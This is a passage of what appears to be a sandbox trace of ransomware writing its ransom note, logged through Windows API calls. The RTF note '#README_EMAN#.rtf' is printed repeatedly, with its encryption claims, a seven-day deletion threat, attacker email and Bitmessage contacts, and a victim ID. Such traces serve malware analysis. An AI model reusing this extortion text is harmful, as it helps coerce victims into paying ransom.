n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.325] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.328] CloseHandle (hObject=0x2e8) returned 1 [0289.328] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0289.328] GetLastError () returned 0x2 [0289.328] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 